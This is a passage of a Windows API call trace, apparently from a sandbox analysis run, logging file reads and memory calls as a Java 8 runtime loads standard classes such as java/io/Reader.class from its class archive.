liDistanceToMove=0x316e9bf, lpNewFilePointer=0x208cec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cec0*=51833279) returned 1 [0097.093] ReadFile (in: hFile=0x134, lpBuffer=0x21030b0, nNumberOfBytesToRead=0xa7, lpNumberOfBytesRead=0x208ce90, lpOverlapped=0x0 | out: lpBuffer=0x21030b0*, lpNumberOfBytesRead=0x208ce90*=0xa7, lpOverlapped=0x0) returned 1 [0097.093] free (_Block=0x121d8180) [0097.093] free (_Block=0x121d9990) [0097.103] malloc (_Size=0x48) returned 0x121d9670 [0097.103] malloc (_Size=0xa0) returned 0x1221be60 [0097.103] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341af80, lpNewFilePointer=0x208cdb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdb0*=54636416) returned 1 [0097.104] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd80, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208cd80*=0xa0, lpOverlapped=0x0) returned 1 [0097.104] malloc (_Size=0x1e) returned 0x121d80c0 [0097.104] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316d1ff, lpNewFilePointer=0x208c9b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9b0*=51827199) returned 1 [0097.104] ReadFile (in: hFile=0x134, lpBuffer=0x208ca00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c980, lpOverlapped=0x0 | out: lpBuffer=0x208ca00*, lpNumberOfBytesRead=0x208c980*=0x1e, lpOverlapped=0x0) returned 1 [0097.106] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316d23a, lpNewFilePointer=0x208ca10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca10*=51827258) returned 1 [0097.106] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1741, lpNumberOfBytesRead=0x208c9e0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c9e0*=0x1741, lpOverlapped=0x0) returned 1 [0097.112] strlen (_Str="java/lang/ClassLoader$ParallelLoaders.class") returned 0x2b [0097.112] malloc (_Size=0x48) returned 0x121d9a30 [0097.112] malloc (_Size=0xa0) returned 0x1221be60 [0097.112] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341af27, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=54636327) returned 1 [0097.112] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208cd30*=0xa0, lpOverlapped=0x0) returned 1 [0097.113] malloc (_Size=0x2c) returned 0x121d9f30 [0097.113] free (_Block=0x1221be60) [0097.113] strlen (_Str="java/lang/ClassLoader$ParallelLoaders.class") returned 0x2b [0097.113] strcpy (in: _Dest=0x208cee0, _Source="java/lang/ClassLoader$ParallelLoaders.class" | out: _Dest="java/lang/ClassLoader$ParallelLoaders.class") returned="java/lang/ClassLoader$ParallelLoaders.class" [0097.113] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316cd66, lpNewFilePointer=0x208c960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c960*=51826022) returned 1 [0097.113] ReadFile (in: hFile=0x134, lpBuffer=0x208c9b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c930, lpOverlapped=0x0 | out: lpBuffer=0x208c9b0*, lpNumberOfBytesRead=0x208c930*=0x1e, lpOverlapped=0x0) returned 1 [0097.116] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316cdaf, lpNewFilePointer=0x208c9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9c0*=51826095) returned 1 [0097.116] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x450, lpNumberOfBytesRead=0x208c990, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c990*=0x450, lpOverlapped=0x0) returned 1 [0097.116] free (_Block=0x121d80c0) [0097.116] free (_Block=0x121d9670) [0097.128] strlen (_Str="java/util/WeakHashMap$Entry.class") returned 0x21 [0097.128] malloc (_Size=0x48) returned 0x121d99e0 [0097.143] malloc (_Size=0xa0) returned 0x1221be60 [0097.143] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341aed8, lpNewFilePointer=0x208c590, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c590*=54636248) returned 1 [0097.143] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c560, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208c560*=0xa0, lpOverlapped=0x0) returned 1 [0097.144] malloc (_Size=0x22) returned 0x121d7ee0 [0097.144] free (_Block=0x1221be60) [0097.144] strlen (_Str="java/util/WeakHashMap$Entry.class") returned 0x21 [0097.145] strcpy (in: _Dest=0x208c710, _Source="java/util/WeakHashMap$Entry.class" | out: _Dest="java/util/WeakHashMap$Entry.class") returned="java/util/WeakHashMap$Entry.class" [0097.145] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316c5f3, lpNewFilePointer=0x208c190, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c190*=51824115) returned 1 [0097.145] ReadFile (in: hFile=0x134, lpBuffer=0x208c1e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c160, lpOverlapped=0x0 | out: lpBuffer=0x208c1e0*, lpNumberOfBytesRead=0x208c160*=0x1e, lpOverlapped=0x0) returned 1 [0097.145] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316c632, lpNewFilePointer=0x208c1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1f0*=51824178) returned 1 [0097.145] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x734, lpNumberOfBytesRead=0x208c1c0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c1c0*=0x734, lpOverlapped=0x0) returned 1 [0097.146] free (_Block=0x121d9f30) [0097.147] free (_Block=0x121d9a30) [0097.156] strlen (_Str="java/util/Collections$SetFromMap.class") returned 0x26 [0097.157] malloc (_Size=0x48) returned 0x121d93f0 [0097.157] malloc (_Size=0xa0) returned 0x1221be60 [0097.157] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ae84, lpNewFilePointer=0x208c670, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c670*=54636164) returned 1 [0097.157] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c640, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208c640*=0xa0, lpOverlapped=0x0) returned 1 [0097.157] malloc (_Size=0x27) returned 0x121d8180 [0097.157] free (_Block=0x1221be60) [0097.157] strlen (_Str="java/util/Collections$SetFromMap.class") returned 0x26 [0097.158] strcpy (in: _Dest=0x208c7f0, _Source="java/util/Collections$SetFromMap.class" | out: _Dest="java/util/Collections$SetFromMap.class") returned="java/util/Collections$SetFromMap.class" [0097.158] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316b92d, lpNewFilePointer=0x208c270, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c270*=51820845) returned 1 [0097.158] ReadFile (in: hFile=0x134, lpBuffer=0x208c2c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c240, lpOverlapped=0x0 | out: lpBuffer=0x208c2c0*, lpNumberOfBytesRead=0x208c240*=0x1e, lpOverlapped=0x0) returned 1 [0097.159] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316b971, lpNewFilePointer=0x208c2d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2d0*=51820913) returned 1 [0097.159] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xc82, lpNumberOfBytesRead=0x208c2a0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c2a0*=0xc82, lpOverlapped=0x0) returned 1 [0097.160] free (_Block=0x121d7ee0) [0097.160] free (_Block=0x121d99e0) [0097.175] malloc (_Size=0x48) returned 0x121d9ad0 [0097.175] malloc (_Size=0xa0) returned 0x1221be60 [0097.175] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ae34, lpNewFilePointer=0x208c5a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5a0*=54636084) returned 1 [0097.175] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c570, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208c570*=0xa0, lpOverlapped=0x0) returned 1 [0097.175] malloc (_Size=0x23) returned 0x121d7d30 [0097.175] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316b412, lpNewFilePointer=0x208c1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1a0*=51819538) returned 1 [0097.175] ReadFile (in: hFile=0x134, lpBuffer=0x208c1f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c170, lpOverlapped=0x0 | out: lpBuffer=0x208c1f0*, lpNumberOfBytesRead=0x208c170*=0x1e, lpOverlapped=0x0) returned 1 [0097.175] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316b452, lpNewFilePointer=0x208c200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c200*=51819602) returned 1 [0097.175] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x4db, lpNumberOfBytesRead=0x208c1d0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c1d0*=0x4db, lpOverlapped=0x0) returned 1 [0097.189] strlen (_Str="java/net/URLClassLoader$7.class") returned 0x1f [0097.189] malloc (_Size=0x48) returned 0x121d9580 [0097.189] malloc (_Size=0xa0) returned 0x1221be60 [0097.189] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ade7, lpNewFilePointer=0x208d1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1f0*=54636007) returned 1 [0097.189] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d1c0, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208d1c0*=0xa0, lpOverlapped=0x0) returned 1 [0097.189] malloc (_Size=0x20) returned 0x121d7a30 [0097.190] free (_Block=0x1221be60) [0097.190] strlen (_Str="java/net/URLClassLoader$7.class") returned 0x1f [0097.190] strcpy (in: _Dest=0x208d370, _Source="java/net/URLClassLoader$7.class" | out: _Dest="java/net/URLClassLoader$7.class") returned="java/net/URLClassLoader$7.class" [0097.190] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316b130, lpNewFilePointer=0x208cdf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdf0*=51818800) returned 1 [0097.190] ReadFile (in: hFile=0x134, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cdc0, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cdc0*=0x1e, lpOverlapped=0x0) returned 1 [0097.191] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316b16d, lpNewFilePointer=0x208ce50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce50*=51818861) returned 1 [0097.191] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x2a5, lpNumberOfBytesRead=0x208ce20, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ce20*=0x2a5, lpOverlapped=0x0) returned 1 [0097.191] free (_Block=0x121d7d30) [0097.192] free (_Block=0x121d9ad0) [0097.193] strlen (_Str="sun/misc/JavaNetAccess.class") returned 0x1c [0097.193] malloc (_Size=0x48) returned 0x121d8fe0 [0097.193] malloc (_Size=0xa0) returned 0x1221be60 [0097.193] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ad9d, lpNewFilePointer=0x208c730, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c730*=54635933) returned 1 [0097.194] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c700, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208c700*=0xa0, lpOverlapped=0x0) returned 1 [0097.194] malloc (_Size=0x1d) returned 0x121d7af0 [0097.194] free (_Block=0x1221be60) [0097.194] strlen (_Str="sun/misc/JavaNetAccess.class") returned 0x1c [0097.194] strcpy (in: _Dest=0x208c8b0, _Source="sun/misc/JavaNetAccess.class" | out: _Dest="sun/misc/JavaNetAccess.class") returned="sun/misc/JavaNetAccess.class" [0097.195] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316b012, lpNewFilePointer=0x208c330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c330*=51818514) returned 1 [0097.195] ReadFile (in: hFile=0x134, lpBuffer=0x208c380, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c300, lpOverlapped=0x0 | out: lpBuffer=0x208c380*, lpNumberOfBytesRead=0x208c300*=0x1e, lpOverlapped=0x0) returned 1 [0097.195] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316b04c, lpNewFilePointer=0x208c390, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c390*=51818572) returned 1 [0097.195] ReadFile (in: hFile=0x134, lpBuffer=0x2102e70, nNumberOfBytesToRead=0xe4, lpNumberOfBytesRead=0x208c360, lpOverlapped=0x0 | out: lpBuffer=0x2102e70*, lpNumberOfBytesRead=0x208c360*=0xe4, lpOverlapped=0x0) returned 1 [0097.196] free (_Block=0x121d7a30) [0097.196] free (_Block=0x121d9580) [0097.207] strlen (_Str="sun/misc/Launcher$ExtClassLoader$1.class") returned 0x28 [0097.207] malloc (_Size=0x48) returned 0x121d9d50 [0097.207] malloc (_Size=0xa0) returned 0x1221be60 [0097.207] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341acfa, lpNewFilePointer=0x208dbd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbd0*=54635770) returned 1 [0097.207] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dba0, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208dba0*=0xa0, lpOverlapped=0x0) returned 1 [0097.207] malloc (_Size=0x29) returned 0x121daab0 [0097.208] free (_Block=0x1221be60) [0097.208] strlen (_Str="sun/misc/Launcher$ExtClassLoader$1.class") returned 0x28 [0097.208] strcpy (in: _Dest=0x208dd50, _Source="sun/misc/Launcher$ExtClassLoader$1.class" | out: _Dest="sun/misc/Launcher$ExtClassLoader$1.class") returned="sun/misc/Launcher$ExtClassLoader$1.class" [0097.208] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316a1a9, lpNewFilePointer=0x208d7d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7d0*=51814825) returned 1 [0097.208] ReadFile (in: hFile=0x134, lpBuffer=0x208d820, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d7a0, lpOverlapped=0x0 | out: lpBuffer=0x208d820*, lpNumberOfBytesRead=0x208d7a0*=0x1e, lpOverlapped=0x0) returned 1 [0097.210] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316a1ef, lpNewFilePointer=0x208d830, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d830*=51814895) returned 1 [0097.210] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x3b0, lpNumberOfBytesRead=0x208d800, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d800*=0x3b0, lpOverlapped=0x0) returned 1 [0097.210] free (_Block=0x121d7af0) [0097.211] free (_Block=0x121d8fe0) [0097.218] strlen (_Str="java/util/StringTokenizer.class") returned 0x1f [0097.218] malloc (_Size=0x48) returned 0x121d91c0 [0097.219] malloc (_Size=0xa0) returned 0x1221be60 [0097.219] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ad50, lpNewFilePointer=0x208cea0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cea0*=54635856) returned 1 [0097.219] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce70, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208ce70*=0xa0, lpOverlapped=0x0) returned 1 [0097.219] malloc (_Size=0x20) returned 0x121d80c0 [0097.219] free (_Block=0x1221be60) [0097.220] strlen (_Str="java/util/StringTokenizer.class") returned 0x1f [0097.220] strcpy (in: _Dest=0x208d020, _Source="java/util/StringTokenizer.class" | out: _Dest="java/util/StringTokenizer.class") returned="java/util/StringTokenizer.class" [0097.220] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316a59f, lpNewFilePointer=0x208caa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208caa0*=51815839) returned 1 [0097.220] ReadFile (in: hFile=0x134, lpBuffer=0x208caf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca70, lpOverlapped=0x0 | out: lpBuffer=0x208caf0*, lpNumberOfBytesRead=0x208ca70*=0x1e, lpOverlapped=0x0) returned 1 [0097.220] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316a5dc, lpNewFilePointer=0x208cb00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb00*=51815900) returned 1 [0097.220] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xa36, lpNumberOfBytesRead=0x208cad0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208cad0*=0xa36, lpOverlapped=0x0) returned 1 [0097.221] free (_Block=0x121daab0) [0097.221] free (_Block=0x121d9d50) [0097.244] strlen (_Str="sun/misc/MetaIndex.class") returned 0x18 [0097.244] malloc (_Size=0x48) returned 0x121d98a0 [0097.244] malloc (_Size=0xa0) returned 0x1221be60 [0097.245] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341acb4, lpNewFilePointer=0x208ccb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccb0*=54635700) returned 1 [0097.245] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc80, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208cc80*=0xa0, lpOverlapped=0x0) returned 1 [0097.245] malloc (_Size=0x19) returned 0x121d8180 [0097.245] free (_Block=0x1221be60) [0097.245] strlen (_Str="sun/misc/MetaIndex.class") returned 0x18 [0097.245] strcpy (in: _Dest=0x208ce30, _Source="sun/misc/MetaIndex.class" | out: _Dest="sun/misc/MetaIndex.class") returned="sun/misc/MetaIndex.class" [0097.246] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3169765, lpNewFilePointer=0x208c8b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8b0*=51812197) returned 1 [0097.246] ReadFile (in: hFile=0x134, lpBuffer=0x208c900, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c880, lpOverlapped=0x0 | out: lpBuffer=0x208c900*, lpNumberOfBytesRead=0x208c880*=0x1e, lpOverlapped=0x0) returned 1 [0097.277] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316979b, lpNewFilePointer=0x208c910, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c910*=51812251) returned 1 [0097.277] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xa0e, lpNumberOfBytesRead=0x208c8e0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c8e0*=0xa0e, lpOverlapped=0x0) returned 1 [0097.278] free (_Block=0x121d80c0) [0097.278] free (_Block=0x121d91c0) [0097.285] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\meta-index") returned 0x35 [0097.285] malloc (_Size=0x76) returned 0x12219770 [0097.285] wcscpy (in: _Dest=0x12219770, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\meta-index" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\meta-index") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\meta-index" [0097.285] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\meta-index", nBufferLength=0x9, lpBuffer=0x208de28, lpFilePart=0x208de20 | out: lpBuffer="", lpFilePart=0x208de20*=0x0) returned 0x36 [0097.285] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\meta-index"), fInfoLevelId=0x0, lpFileInformation=0x208dbc0 | out: lpFileInformation=0x208dbc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3e044f, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3e044f, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3e1944, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x5b5)) returned 1 [0097.344] free (_Block=0x12219770) [0097.345] strlen (_Str="java/io/BufferedReader.class") returned 0x1c [0097.345] malloc (_Size=0x48) returned 0x121d95d0 [0097.345] malloc (_Size=0xa0) returned 0x1221be60 [0097.345] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ac6a, lpNewFilePointer=0x208cec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cec0*=54635626) returned 1 [0097.345] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce90, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208ce90*=0xa0, lpOverlapped=0x0) returned 1 [0097.345] malloc (_Size=0x1d) returned 0x121d7a30 [0097.345] free (_Block=0x1221be60) [0097.345] strlen (_Str="java/io/BufferedReader.class") returned 0x1c [0097.345] strcpy (in: _Dest=0x208d040, _Source="java/io/BufferedReader.class" | out: _Dest="java/io/BufferedReader.class") returned="java/io/BufferedReader.class" [0097.345] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31684e1, lpNewFilePointer=0x208cac0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cac0*=51807457) returned 1 [0097.345] ReadFile (in: hFile=0x134, lpBuffer=0x208cb10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca90, lpOverlapped=0x0 | out: lpBuffer=0x208cb10*, lpNumberOfBytesRead=0x208ca90*=0x1e, lpOverlapped=0x0) returned 1 [0097.437] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316851b, lpNewFilePointer=0x208cb20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb20*=51807515) returned 1 [0097.437] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x124a, lpNumberOfBytesRead=0x208caf0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208caf0*=0x124a, lpOverlapped=0x0) returned 1 [0097.438] free (_Block=0x121d8180) [0097.438] free (_Block=0x121d98a0) [0097.448] strlen (_Str="java/io/Reader.class") returned 0x14 [0097.448] malloc (_Size=0x48) returned 0x121d9080 [0097.448] malloc (_Size=0xa0) returned 0x1221be60 [0097.448] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ac28, lpNewFilePointer=0x208c480, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c480*=54635560) returned 1 [0097.449] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c450, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208c450*=0xa0, lpOverlapped=0x0) returned 1 [0097.449] malloc (_Size=0x15) returned 0x1221b800 [0097.449] free (_Block=0x1221be60) [0097.449] strlen (_Str="java/io/Reader.class") returned 0x14 [0097.450] strcpy (in: _Dest=0x208c600, _Source="java/io/Reader.class" | out: _Dest="java/io/Reader.class") returned="java/io/Reader.class" [0097.450] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3167e5d, lpNewFilePointer=0x208c080, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c080*=51805789) returned 1 [0097.450] ReadFile (in: hFile=0x134, lpBuffer=0x208c0d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c050, lpOverlapped=0x0 | out: lpBuffer=0x208c0d0*, lpNumberOfBytesRead=0x208c050*=0x1e, lpOverlapped=0x0) returned 1 [0097.494] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3167e8f, lpNewFilePointer=0x208c0e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0e0*=51805839) returned 1 [0097.494] ReadFile (in: hFile=0x134, lpBuffer=0x2103df0, nNumberOfBytesToRead=0x652, lpNumberOfBytesRead=0x208c0b0, lpOverlapped=0x0 | out: lpBuffer=0x2103df0*, lpNumberOfBytesRead=0x208c0b0*=0x652, lpOverlapped=0x0) returned 1 [0097.494] free (_Block=0x121d7a30) [0097.495] free (_Block=0x121d95d0) [0097.496] strlen (_Str="java/lang/Readable.class") returned 0x18 [0097.496] malloc (_Size=0x48) returned 0x121d9210 [0097.496] malloc (_Size=0xa0) returned 0x1221be60 [0097.496] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341abe2, lpNewFilePointer=0x208b9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9c0*=54635490) returned 1 [0097.496] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b990, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208b990*=0xa0, lpOverlapped=0x0) returned 1 [0097.496] malloc (_Size=0x19) returned 0x121d7d30 [0097.497] free (_Block=0x1221be60) [0097.523] strlen (_Str="java/lang/Readable.class") returned 0x18 [0097.523] strcpy (in: _Dest=0x208bb40, _Source="java/lang/Readable.class" | out: _Dest="java/lang/Readable.class") returned="java/lang/Readable.class" [0097.523] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3167d87, lpNewFilePointer=0x208b5c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5c0*=51805575) returned 1 [0097.523] ReadFile (in: hFile=0x134, lpBuffer=0x208b610, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b590, lpOverlapped=0x0 | out: lpBuffer=0x208b610*, lpNumberOfBytesRead=0x208b590*=0x1e, lpOverlapped=0x0) returned 1 [0097.523] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3167dbd, lpNewFilePointer=0x208b620, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b620*=51805629) returned 1 [0097.523] ReadFile (in: hFile=0x134, lpBuffer=0x21045e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b5f0, lpOverlapped=0x0 | out: lpBuffer=0x21045e0*, lpNumberOfBytesRead=0x208b5f0*=0xa0, lpOverlapped=0x0) returned 1 [0097.524] free (_Block=0x1221b800) [0097.524] free (_Block=0x121d9080) [0097.545] strlen (_Str="java/io/FileReader.class") returned 0x18 [0097.545] malloc (_Size=0x48) returned 0x121d9da0 [0097.545] malloc (_Size=0xa0) returned 0x1221be60 [0097.545] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ab9c, lpNewFilePointer=0x208ceb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ceb0*=54635420) returned 1 [0097.545] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce80, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208ce80*=0xa0, lpOverlapped=0x0) returned 1 [0097.545] malloc (_Size=0x19) returned 0x121d7af0 [0097.546] free (_Block=0x1221be60) [0097.546] strlen (_Str="java/io/FileReader.class") returned 0x18 [0097.546] strcpy (in: _Dest=0x208d030, _Source="java/io/FileReader.class" | out: _Dest="java/io/FileReader.class") returned="java/io/FileReader.class" [0097.546] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3167b8f, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=51805071) returned 1 [0097.546] ReadFile (in: hFile=0x134, lpBuffer=0x208cb00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x208cb00*, 